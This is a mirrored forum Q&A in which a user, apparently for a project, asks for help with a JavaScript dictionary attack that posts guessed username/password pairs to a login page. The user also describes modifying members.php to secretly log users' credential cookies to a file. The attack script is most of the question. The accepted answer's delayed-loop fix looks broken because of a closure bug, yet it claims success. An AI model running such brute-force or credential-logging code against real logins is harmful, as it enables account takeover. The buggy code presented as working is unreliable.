DEVHIDE
Login Or Sign up

Checking if the attempt was successful during a Dictionary Attack

746 Views Asked by At

I am doing a project where in I have to carry out a Dictionary Attack. I am running a script that posts to the page that the login page would post to(say members.php). Only thing that happens in the server side after a correct username and passwords is entered is that a cookies are set. The Cookies have the values of username and password's sha value. (Yes, I have the access to the source code).

I have hard coded a script in members.php such that would retrieve the value of cookies every time some one logs in and stores it in a text file in my server. Hence I would be able to keep track of who ever has successfully logged in .

I am trying the following script to post to members.php to try and see if the logic works:

    function dictionary_run(username,password) {
    var theForm, newInput7, newInput8, newInput9;
    var i=0,j=0;
    var bla3 = "Login";
    theForm = document.createElement("form");
    theForm.action = "URL/members.php";
    theForm.method = "post"; 

    newInput9 = document.createElement("input");
    newInput9.type = "text";
    newInput9.name = "username";
    newInput9.value = username;

    newInput8 = document.createElement("input");
    newInput8.type = "password";
    newInput8.name = "password";
    newInput8.value = password;

    newInput7 = document.createElement("input");
    newInput7.type = "submit";
    newInput7.name = "submit";
    newInput7.value = bla3;

    theForm.appendChild(newInput9);
    theForm.appendChild(newInput8);
    theForm.appendChild(newInput7);
    newInput7.click();
}
function main() {
    var user_name = ["jasmine", "fd", "jasmhghine","dfdf"];
    var pass_word = ["jasmine", "jasminhge", "dffd","dfdfdf"];
    var i,j;
    for(i=0; i<4 ;i++) {
    for(j=0; j<4;j++) {
    dictionary_run(user_name[i],pass_word[j]);
    }
    }

}    
main();

Apparently it doesn't work. I know that jasmine as password and username is correct(user_name[0] and pass_word[0] here). Even then,my script hard coded in members.php doesn't capture the successful login attempt.

I have also tried to break it with

if(document.cookie) break;

after each submission. This also doesn't work. I can not think of another way to check if the login attempt was successful or not.

Any help would be greatly appreciated. Thanks!

javascript cookies forms dictionary-attack http-post
Original Q&A
1

There are 1 best solutions below

0
On

Alright, I found the problem, just because I was posting in very quick successions, only the last input was being checked. So I just used a delay of a few seconds and it worked.

  for(i=0; i<4;i++) {
    for(j=0; j<4;j++) {
      var delay=5000;//1 seconds
  setTimeout(function(){
  dictionary_run(user_name[i],pass_word[j]);
  },delay); 
    }
    }

Thanks !

Related Questions in JAVASCRIPT

Related Questions in COOKIES

Related Questions in FORMS

Related Questions in DICTIONARY-ATTACK

Related Questions in HTTP-POST

Trending Questions

Popular # Hahtags

javascript python java c# php android html jquery c++ css ios sql mysql r reactjs node.js arrays c asp.net json python-3.x ruby-on-rails .net sql-server swift django angular objective-c pandas excel

Popular Questions

Copyright © 2021 Jogjafile Inc.